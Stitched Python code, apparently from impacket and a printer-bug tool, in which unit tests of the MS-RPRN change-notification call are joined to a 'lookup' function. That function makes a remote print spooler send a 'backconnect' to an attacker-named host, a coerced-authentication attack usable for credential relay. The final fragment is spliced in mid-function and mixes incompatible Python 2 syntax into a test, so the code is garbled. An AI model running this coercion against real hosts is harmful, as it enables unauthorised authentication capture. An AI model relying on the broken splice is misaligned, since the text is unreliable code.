    def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self):
        """Exercise RpcOpenPrinter followed by RpcRemoteFindFirstPrinterChangeNotificationEx.

        A print-server handle for ``self.machine`` is opened with the combined
        SERVER_READ | SERVER_ALL_ACCESS | SERVER_ACCESS_ADMINISTER mask, then a
        PRINTER_CHANGE_ADD_JOB change-notification request is issued that
        names ``self.machine`` itself as the notification target.  A DCERPC
        error whose text contains ``ERROR_INVALID_HANDLE`` is accepted as a
        valid outcome; any other exception propagates and fails the test.
        """
        dce, _transport = self.connect()

        # Same UNC server name is used for both the open and the notify call.
        server_name = '\\\\%s\x00' % self.machine

        open_req = rprn.RpcOpenPrinter()
        open_req['pPrinterName'] = server_name
        open_req['pDatatype'] = NULL
        open_req['pDevModeContainer']['pDevMode'] = NULL
        open_req['AccessRequired'] = (rprn.SERVER_READ
                                      | rprn.SERVER_ALL_ACCESS
                                      | rprn.SERVER_ACCESS_ADMINISTER)
        open_req.dump()
        open_resp = dce.request(open_req)
        open_resp.dump()

        notify_req = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
        notify_req['hPrinter'] = open_resp['pHandle']
        notify_req['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
        notify_req['pszLocalMachine'] = server_name
        notify_req['pOptions'] = NULL
        notify_req.dump()
        try:
            notify_resp = dce.request(notify_req)
            notify_resp.dump()
        except Exception as err:
            # Only ERROR_INVALID_HANDLE is tolerated; everything else is a
            # test failure and is re-raised unchanged.
            if 'ERROR_INVALID_HANDLE' not in str(err):
                raise
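    def lookup(self, rpctransport, host):
        """Bind to the MS-RPRN endpoint on ``host`` and request a printer change notification.

        Steps, each of which logs and returns early on failure:

        1. If ``self.__tcp_ping`` is set, skip hosts for which
           ``self.ping(host)`` returns ``False``.
        2. Connect the DCE/RPC transport and bind to ``MSRPC_UUID_RPRN``.
        3. Open the print-server handle for ``host`` with ``hRpcOpenPrinter``.
           A "Broken pipe" error is treated as a dropped connection and
           ``ACCESS_DENIED`` as insufficient privilege; any other error is
           re-raised.
        4. Issue ``RpcRemoteFindFirstPrinterChangeNotificationEx`` for
           ``PRINTER_CHANGE_ADD_JOB`` with ``self.__attackerhost`` as
           ``pszLocalMachine``.  An error from this call is only logged: the
           reply alone does not tell whether the spooler acted on it (hence
           the "may or may not have worked" message).
        5. Disconnect.

        Args:
            rpctransport: impacket transport object providing ``get_dce_rpc()``.
            host: target host name or address.

        Returns:
            None on every path.
        """
        if self.__tcp_ping and self.ping(host) is False:
            logging.info("Host is offline. Skipping!")
            return

        dce = rpctransport.get_dce_rpc()
        try:
            dce.connect()
        except Exception:
            # Probably this isn't a Windows machine or SMB is closed
            logging.error("Timeout - Skipping host!")
            return
        dce.bind(rprn.MSRPC_UUID_RPRN)
        logging.info('Bind OK')
        try:
            resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
        except Exception as e:
            message = str(e)
            if 'Broken pipe' in message:
                # The connection timed-out. Let's try to bring it back next round
                logging.error('Connection failed - skipping host!')
                return
            # Bug fix: the previous test was ``str(e).upper().find('ACCESS_DENIED')``
            # used as a bare truth value.  find() returns -1 when the substring is
            # absent, which is truthy, so every non-"Broken pipe" error was
            # reported as access denied and the re-raise below was unreachable.
            if 'ACCESS_DENIED' in message.upper():
                # We're not admin, bye
                logging.error('Access denied - RPC call was denied')
                dce.disconnect()
                return
            raise
        logging.info('Got handle')

        request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
        request['hPrinter'] = resp['pHandle']
        request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
        request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
        request['pOptions'] = NULL
        try:
            dce.request(request)
        except Exception as e:
            # Logged through the same logger as the other failures instead of
            # print(); the call is not treated as fatal (see the docstring).
            logging.error('%s', e)
        logging.info(
            'Triggered RPC backconnect, this may or may not have worked')

        dce.disconnect()

        return None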
    def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self):
        """Exercise RpcOpenPrinter followed by RpcRemoteFindFirstPrinterChangeNotificationEx.

        A print-server handle for ``self.machine`` is opened with the combined
        SERVER_READ | SERVER_ALL_ACCESS | SERVER_ACCESS_ADMINISTER mask, then a
        PRINTER_CHANGE_ADD_JOB change-notification request naming
        ``self.machine`` itself as the target is issued.  The test expects
        that second call to raise ``rprn.DCERPCSessionError`` whose message
        matches ``ERROR_INVALID_HANDLE``.
        """
        dce, _transport = self.connect()

        # Same UNC server name is used for both the open and the notify call.
        server_name = "\\\\%s\x00" % self.machine

        open_req = rprn.RpcOpenPrinter()
        open_req['pPrinterName'] = server_name
        open_req['pDatatype'] = NULL
        open_req['pDevModeContainer']['pDevMode'] = NULL
        open_req['AccessRequired'] = (rprn.SERVER_READ
                                      | rprn.SERVER_ALL_ACCESS
                                      | rprn.SERVER_ACCESS_ADMINISTER)
        open_req.dump()
        open_resp = dce.request(open_req)
        open_resp.dump()

        notify_req = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
        notify_req['hPrinter'] = open_resp['pHandle']
        notify_req['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
        notify_req['pszLocalMachine'] = server_name
        notify_req['pOptions'] = NULL
        notify_req.dump()
        # The expected outcome is the session error; its absence fails the test.
        with assertRaisesRegex(self, rprn.DCERPCSessionError,
                               "ERROR_INVALID_HANDLE"):
            dce.request(notify_req)
            resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
        except Exception, e:
            if str(e).find('Broken pipe') >= 0:
                # The connection timed-out. Let's try to bring it back next round
                logging.error('Connection failed - skipping host!')
                return False
            elif str(e).upper().find('ACCESS_DENIED'):
                # We're not admin, bye
                logging.error('Access denied - RPC call was denied')
                dce.disconnect()
                return False
            else:
                return False
        logging.info('Got handle')

        request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
        request['hPrinter'] = resp['pHandle']
        request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
        request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
        request['pOptions'] = NULL
        try:
            resp = dce.request(request)
        except Exception as e:
            pass
        logging.info(
            'Triggered RPC backconnect, this may or may not have worked')

        dce.disconnect()

        return True